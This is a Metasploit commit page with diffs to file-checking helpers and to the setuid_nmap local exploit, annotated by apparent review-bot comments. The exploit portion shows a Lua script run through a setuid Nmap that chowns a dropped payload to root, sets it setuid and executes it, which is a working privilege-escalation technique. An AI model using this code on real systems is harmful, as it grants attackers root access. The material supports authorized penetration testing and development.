Land #9446, Post API fix for setuid_nmap

MS-2855/keylogger-mettle-extension
William Vu 2018-01-25 16:00:40 -06:00
commit 309deb9ee7
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743
2 changed files with 38 additions and 19 deletions


@ -59,7 +59,7 @@ module Msf::Post::File
#
# @param path [String] Remote filename to check
def directory?(path)
if session.type == "meterpreter"
if session.type == 'meterpreter'
stat = session.fs.file.stat(path) rescue nil
return false unless stat
return stat.directory?
@ -70,9 +70,9 @@ module Msf::Post::File
f = session.shell_command_token("test -d \"#{path}\" && echo true")
end
return false if f.nil? or f.empty?
return false if f.nil? || f.empty?
return false unless f =~ /true/
return true
true
end
end
@ -93,7 +93,7 @@ module Msf::Post::File
#
# @param path [String] Remote filename to check
def file?(path)
if session.type == "meterpreter"
if session.type == 'meterpreter'
stat = session.fs.file.stat(path) rescue nil
return false unless stat
return stat.file?
@ -107,20 +107,40 @@ module Msf::Post::File
f = session.shell_command_token("test -f \"#{path}\" && echo true")
end
return false if f.nil? or f.empty?
return false if f.nil? || f.empty?
return false unless f =~ /true/
return true
true
end
end
alias file_exist? file?
#
# See if +path+ on the remote system is a setuid file
#
# @param path [String] Remote filename to check
def setuid?(path)
if session.type == 'meterpreter'
stat = session.fs.file.stat(path) rescue nil
return false unless stat
return stat.setuid?
else
if session.platform != 'windows'
f = session.shell_command_token("test -u \"#{path}\" && echo true")
end
return false if f.nil? || f.empty?
return false unless f =~ /true/
true
end
end
#
# Check for existence of +path+ on the remote file system
#
# @param path [String] Remote filename to check
def exist?(path)
if session.type == "meterpreter"
if session.type == 'meterpreter'
stat = session.fs.file.stat(path) rescue nil
return !!(stat)
else
@ -130,9 +150,9 @@ module Msf::Post::File
f = cmd_exec("test -e \"#{path}\" && echo true")
end
return false if f.nil? or f.empty?
return false if f.nil? || f.empty?
return false unless f =~ /true/
return true
true
end
end
@ -290,7 +310,7 @@ module Msf::Post::File
end
end
return true
true
end
#
@ -314,7 +334,7 @@ module Msf::Post::File
_write_file_unix_shell(file_name, data, true)
end
end
return true
true
end
#
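Review bot: The new `setuid?` interpolates `path` unescaped into `test -u "#{path}" && echo true`, so a path containing a double quote or other shell metacharacters breaks the check instead of answering it; the surrounding `directory?`, `file?` and `exist?` helpers use the same pattern, so a fix belongs in one shared quoting step for all four rather than in this method alone. The YARD block above `setuid?` also lacks the return contract: `# @return [Boolean] true only when the session can confirm the setuid bit`. It is worth stating in that comment that on a non-meterpreter Windows session `f` is never assigned, so the method always returns false there rather than raising; whether the meterpreter stat object's `setuid?` is implemented for every platform cannot be confirmed from this hunk.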


@ -51,12 +51,11 @@ class MetasploitModule < Msf::Exploit::Local
end
def check
stat = session.fs.file.stat(datastore["Nmap"])
if stat and stat.file? and stat.setuid?
vprint_good("#{stat.prettymode} #{datastore["Nmap"]}")
if setuid?(datastore['Nmap'])
vprint_good("#{datastore['Nmap']} is setuid")
return CheckCode::Vulnerable
end
return CheckCode::Safe
CheckCode::Safe
end
def exploit
@ -69,16 +68,16 @@ class MetasploitModule < Msf::Exploit::Local
write_file(exe_file, generate_payload_exe)
evil_lua = %Q{
os.execute("chown root:root #{exe_file}");
os.execute("chmod 6777 #{exe_file}");
os.execute("chmod 6700 #{exe_file}");
os.execute("#{exe_file} &");
os.execute("rm #{exe_file}");
os.execute("rm -f #{exe_file}");
}
end
lua_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}.nse"
print_status("Dropping lua #{lua_file}")
write_file(lua_file, evil_lua)
print_status("running")
print_status("Running #{lua_file} with Nmap")
scriptname = lua_file
if (lua_file[0,1] == "/")
@ -91,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Local
# Versions before 4.75 (August 2008) will not run scripts without a port scan
cmd_exec "#{datastore["Nmap"]} --script #{scriptname} -p80 localhost #{datastore["ExtraArgs"]}"
ensure
cmd_exec "rm -f #{lua_file} #{exe_file}"
rm_f(lua_file, exe_file)
end
end
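Review bot: `check` now confirms only the setuid bit and drops the `stat.file?` test the old code combined with it, so a setuid directory or special file at `datastore['Nmap']` is reported as Vulnerable; keeping the original condition is one line, `if file?(datastore['Nmap']) && setuid?(datastore['Nmap'])`. The `rm_f(lua_file, exe_file)` in `ensure` runs for any failure inside `exploit`, and since the method body starts outside this hunk it is not visible whether both locals are always assigned before the first call that can raise; if `rm_f` does not tolerate a nil argument the old `rm -f` string silently did, a guard such as `rm_f(*[lua_file, exe_file].compact)` would preserve that behaviour.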